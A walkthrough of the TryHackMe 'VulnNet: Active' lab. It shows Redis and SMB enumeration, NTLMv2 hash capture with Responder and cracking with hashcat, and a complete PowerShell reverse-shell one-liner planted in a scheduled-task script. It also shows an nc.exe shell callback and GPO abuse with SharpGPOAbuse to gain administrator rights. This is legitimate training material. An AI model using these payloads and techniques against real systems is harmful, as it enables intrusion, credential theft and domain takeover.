VulnNet: Active [THM]

TryHackMe - VulnNet: Active - Write-Up

Port scan

Let's start off by performing a port scan against the target system.

┌──(n㉿kali)-[~]
└─$ nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12

# Nmap 7.91 scan initiated Sun Aug  1 15:06:30 2021 as: nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12
Nmap scan report for 10.10.188.12
Host is up, received user-set (0.055s latency).
Scanned at 2021-08-01 15:06:30 CEST for 187s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
6379/tcp  open  redis         syn-ack Redis key-value store 2.8.2402
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49675/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         syn-ack Microsoft Windows RPC
49695/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 9176/tcp): CLEAN (Timeout)
|   Check 2 (port 50061/tcp): CLEAN (Timeout)
|   Check 3 (port 54977/udp): CLEAN (Timeout)
|   Check 4 (port 50181/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-08-01T13:08:59
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug  1 15:09:37 2021 -- 1 IP address (1 host up) scanned in 187.42 seconds

Interesting ports... 139, 445, 6379

SMB enumeration

Maybe SMB will disclose any useful information. Simply connecting to the target machine using smbclient doesn't help much.

┌──(n㉿kali)-[~]
└─$ smbclient -L \\\\10.10.188.12
Enter WORKGROUP\n's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

However, we are able to at least identify a hostname and domain name using crackmapexec.

┌──(n㉿kali)-[~]
└─$ crackmapexec smb 10.10.188.12
SMB         10.10.188.12    445    VULNNET-BC3TCK1  [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)

Redis enumeration

A quick google search revealed that Redis is an in-memory data structure store, used as a database, cache, and message broker.

Using redis-cli, we are able to query the system for information.

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ redis-cli -h 10.10.188.12 
10.10.188.12:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows  
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:3252
run_id:c281e091e328ed486243adaf6bc305583228de06
tcp_port:6379
uptime_in_seconds:2708
uptime_in_days:0
hz:10
lru_clock:435938
config_file:

# Clients
connected_clients:3
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:987760
used_memory_human:964.61K
used_memory_rss:954216
used_memory_peak:987760
used_memory_peak_human:964.61K
used_memory_lua:36864
mem_fragmentation_ratio:0.97
mem_allocator:dlmalloc-2.8

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1627823182
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok

# Stats
total_connections_received:9
total_commands_processed:12
instantaneous_ops_per_sec:0
total_net_input_bytes:283
total_net_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0

# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.08
used_cpu_user:0.20
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Keyspace

10.10.188.12:6379> CONFIG GET *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "unixsocket"
  8) ""
  9) "logfile"
 10) ""
 11) "pidfile"
 12) "/var/run/redis.pid"
 13) "maxmemory"
 14) "0"
 15) "maxmemory-samples"
 16) "3"
 17) "timeout"
 18) "0"
 19) "tcp-keepalive"
 20) "0"
 21) "auto-aof-rewrite-percentage"
 22) "100"
 23) "auto-aof-rewrite-min-size"
 24) "67108864"
 25) "hash-max-ziplist-entries"
 26) "512"
 27) "hash-max-ziplist-value"
 28) "64"
 29) "list-max-ziplist-entries"
 30) "512"
 31) "list-max-ziplist-value"
 32) "64"
 33) "set-max-intset-entries"
 34) "512"
 35) "zset-max-ziplist-entries"
 36) "128"
 37) "zset-max-ziplist-value"
 38) "64"
 39) "hll-sparse-max-bytes"
 40) "3000"
 41) "lua-time-limit"
 42) "5000"
 43) "slowlog-log-slower-than"
 44) "10000"
 45) "latency-monitor-threshold"
 46) "0"
 47) "slowlog-max-len"
 48) "128"
 49) "port"
 50) "6379"
 51) "tcp-backlog"
 52) "511"
 53) "databases"
 54) "16"
 55) "repl-ping-slave-period"
 56) "10"
 57) "repl-timeout"
 58) "60"
 59) "repl-backlog-size"
 60) "1048576"
 61) "repl-backlog-ttl"
 62) "3600"
 63) "maxclients"
 64) "10000"
 65) "watchdog-period"
 66) "0"
 67) "slave-priority"
 68) "100"
 69) "min-slaves-to-write"
 70) "0"
 71) "min-slaves-max-lag"
 72) "10"
 73) "hz"
 74) "10"
 75) "repl-diskless-sync-delay"
 76) "5"
 77) "no-appendfsync-on-rewrite"
 78) "no"
 79) "slave-serve-stale-data"
 80) "yes"
 81) "slave-read-only"
 82) "yes"
 83) "stop-writes-on-bgsave-error"
 84) "yes"
 85) "daemonize"
 86) "no"
 87) "rdbcompression"
 88) "yes"
 89) "rdbchecksum"
 90) "yes"
 91) "activerehashing"
 92) "yes"
 93) "repl-disable-tcp-nodelay"
 94) "no"
 95) "repl-diskless-sync"
 96) "no"
 97) "aof-rewrite-incremental-fsync"
 98) "yes"
 99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "jd 3600 jd 300 jd 60"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) ""
121) "bind"
122) ""

Scrolling through the output of different commands, we stumble across the "dir" path which contains a username.

103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

Obtaining the user flag

After hours of research, it turns out that Redis can execute sandboxed Lua scripts through the “EVAL” command. dofile() is a command that can be used to enumerate files and directories. dofile() is allowed by the sandbox in older Redis versions.

If the Lua script is syntactically invalid or tries to set global variables, some content of the target file will be leaked through the error messages.

Why not try reading the user.txt file?

┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0                
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED'

Source: Red Team Diary, Entry #2: Stealthily Backdooring CMS Through Redis’ Memory Space

Capturing NTLMv2 hash

Maybe there is a way to capture an NTLM hash? Let's give that a try by running Responder.

┌──(n㉿kali)-[~]
└─$ sudo responder -I tun0                                                 
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.9.1.246]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-MJ06EI78D1C]
    Responder Domain Name      [7KD0.LOCAL]
    Responder DCE-RPC Port     [45088]

[+] Listening for events...

Using the "EVAL" command, we can instruct the target system to connect back to our target machine.

┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('//10.9.1.246//share')" 0
(error) ERR Error running script (call to f_3d1b58af3586d137babc26eb9ef689a682da5aef): @user_script:1: cannot open //10.9.1.246//oof: Invalid argument

We captured a hash!

[SMB] NTLMv2-SSP Client   : 10.10.188.12
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash     : enterprise-security::VULNNET:8384dad31c118aef:615A31F98510A3488251629F7D84FF7C:010004EA4..........

Cracking NTLMv2 hash

Let's get cracking!

┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─ hashcat -a0 -m 5600  hash.hash /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

ENTERPRISE-SECURITY::enterprise-security::VULNNET:8384dad31c118aef:615A31F98510A3488251629F7D84FF7C:010004EA4..........:PASSWORD-REDACTED
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: ENTERPRISE-SECURITY::VULNNET:8384dad31c118aef:615a3...000000
Time.Started.....: Wed Aug  4 22:26:07 2021 (1 sec)
Time.Estimated...: Wed Aug  4 22:26:08 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 23233.5 kH/s (9.47ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 5898240/14344384 (41.12%)
Rejected.........: 0/5898240 (0.00%)
Restore.Point....: 3932160/14344384 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford12 -> madru_gada
Hardware.Mon.#1..: Temp: 48c Util: 18% Core:1890MHz Mem:5000MHz Bus:8

More SMB enumeration

Using the username and password we found earlier, we can try enumerating SMB again.

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient -L \\\\10.10.188.12 -U enterprise-security@vulnnet.local 
Enter enterprise-security@vulnnet.local's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Enterprise-Share Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Let's check out the Enterprise-Share share.

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb 23 23:45:41 2021
  ..                                  D        0  Tue Feb 23 23:45:41 2021
  PurgeIrrelevantData_1826.ps1        A       69  Wed Feb 24 01:33:18 2021

		9558271 blocks of size 4096. 4996387 blocks available

The PurgeIrrelevantData_1826.ps1 script seems to be a part of some scheduled task.

Setting up a Netcat listener

I wonder if we can spawn a shell by overwriting the contents of this ps1 file.

┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234   
listening on [any] 1234 ...

Command Injection - Powershell

Let's modify the contents of PurgeIrrelevantData_1826.ps1 so that it will spawn a shell for us.

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ cat PurgeIrrelevantData_1826.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.9.1.246',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Source: PayloadsAllTheThings Cheatsheet Reverse Shell Powershell

We can overwrite the file with our edited version of the script on the target machine.

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password: 
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1 
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (4.3 kb/s) (average 4.3 kb/s) 
smb: \> put nc.exe
putting file nc.exe as \nc.exe (288.6 kb/s) (average 186.3 kb/s)

I also uploaded the Netcat executable since I didn't receive any STDERR / STDOUT while enumerating the machine using Powershell.

Receiving a shell

WE GOT A SHELL!

┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234   
listening on [any] 1234 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 49872
whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads>

A more stable shell

┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...

PS C:\enterprise-share> Start-Process -FilePath "C:\enterprise-share\nc.exe" -ArgumentList "-nv 10.9.1.246 6666 -e powershell.exe"

Necesarry? No. But definitely helpful when you accidentally exit out of your shell.

┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666    
listening on [any] 6666 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 50037
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\enterprise-share>

PowerView - enumeration

After hours of enumeration, I found something interesting.

Two GPOs: security-pol-vn and Default Domain Controllers Policy.

PS C:\enterprise-share> get-netgpo
get-netgpo


flags                    : 0
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EA
                           C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
                           C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged              : 2/23/2021 11:09:44 PM
versionnumber            : 3
systemflags              : -1946157056
objectguid               : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
showinadvancedviewonly   : True
usnchanged               : 20506
dscorepropagationdata    : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
displayname              : security-pol-vn
gpcfunctionalityversion  : 2
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
usncreated               : 5672
whencreated              : 2/23/2021 9:30:33 AM
instancetype             : 4
objectclass              : {top, container, groupPolicyContainer}
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local

flags                    : 0
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EA
                           C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 2/24/2021 12:14:52 AM
versionnumber            : 4
systemflags              : -1946157056
objectguid               : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
showinadvancedviewonly   : True
usnchanged               : 24594
dscorepropagationdata    : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
displayname              : Default Domain Controllers Policy
gpcfunctionalityversion  : 2
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
usncreated               : 5675
whencreated              : 2/23/2021 9:30:33 AM
instancetype             : 4
objectclass              : {top, container, groupPolicyContainer}
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local

BloodHound - enumeration

Let's get graphical!

PS C:\enterprise-share> .\sharphound.exe
----------------------------------------------
Initializing SharpHound at 1:49 PM on 8/4/2021
----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain VULNNET.LOCAL using path CN=Schema,CN=Configuration,DC=vulnnet,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 59 objects finished (+59 59)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.1978320
Compressing data to .\20210804134951_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 1:49 PM on 8/4/2021! Happy Graphing!

Shortest Path to Domain Admin

Querying BloodHound, we find that our enterprise-security user has GenericWrite access on the security-pol-vn GPO which is being applied to essentially all objects within the vulnnet.local domain.

Since we have GenericWrite privileges on the SECURITY-POL-VN GPO, SharpGPOAbuse or PowerView can be used to abuse these privileges and create a malicious scheduled task.

Maybe we can exploit this misconfiguration.... Let's find out!

Abusing GPO permissions

Let's see what we can do to escalate our privileges.

PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name                    enterprise-security
Full Name                    Enterprise Security
Comment                      TryHackMe
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2021 4:01:37 PM
Password expires             Never
Password changeable          2/24/2021 4:01:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   8/4/2021 1:08:48 PM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

We may try adding the enterprise-security user to the local Administrators group leveraging a tool called SharpGPOAbuse.

PS C:\enterprise-share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!



PS C:\enterprise-share> gpupdate /force
gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

Let's review our group memberships after we forced the policies to be updated on the target machine.

PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name                    enterprise-security
Full Name                    Enterprise Security
Comment                      TryHackMe
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2021 4:01:37 PM
Password expires             Never
Password changeable          2/24/2021 4:01:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   8/4/2021 1:08:48 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *Domain Users         
The command completed successfully.

There we go! The enterprise-security account is now a local administrator.

Obtaining the system flag

Now that we have more privileges, let's access the C$ share and grab the system.txt file.

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\C$ -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password: 
smb: \users\Administrator\Desktop\> ls
  .                                  DR        0  Wed Feb 24 05:27:33 2021
  ..                                 DR        0  Wed Feb 24 05:27:33 2021
  desktop.ini                       AHS      282  Mon Feb 22 22:55:21 2021
  system.txt                          A       37  Wed Feb 24 05:27:45 2021

		9558271 blocks of size 4096. 5011466 blocks available
smb: \users\Administrator\Desktop\> mget system.txt 
Get file system.txt? y
getting file \users\Administrator\Desktop\system.txt of size 37 as system.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ cat system.txt 
THM{FLAG-REDACTED}

Pwned!

PreviousIntroduction NextCyberCrafted [THM] (UNFINISHED)

Last updated 4 years ago

hashtagPort scan

hashtagSMB enumeration

hashtagRedis enumeration

hashtagObtaining the user flag

hashtagCapturing NTLMv2 hash

hashtagCracking NTLMv2 hash

hashtagMore SMB enumeration

hashtagSetting up a Netcat listener

hashtagCommand Injection - Powershell

hashtagReceiving a shell

hashtagA more stable shell

hashtagPowerView - enumeration

hashtagBloodHound - enumeration

hashtagShortest Path to Domain Admin

hashtagAbusing GPO permissions

hashtagObtaining the system flag

Port scan

SMB enumeration

Redis enumeration

Obtaining the user flag

Capturing NTLMv2 hash

Cracking NTLMv2 hash

More SMB enumeration

Setting up a Netcat listener

Command Injection - Powershell

Receiving a shell

A more stable shell

PowerView - enumeration

BloodHound - enumeration

Shortest Path to Domain Admin

Abusing GPO permissions

Obtaining the system flag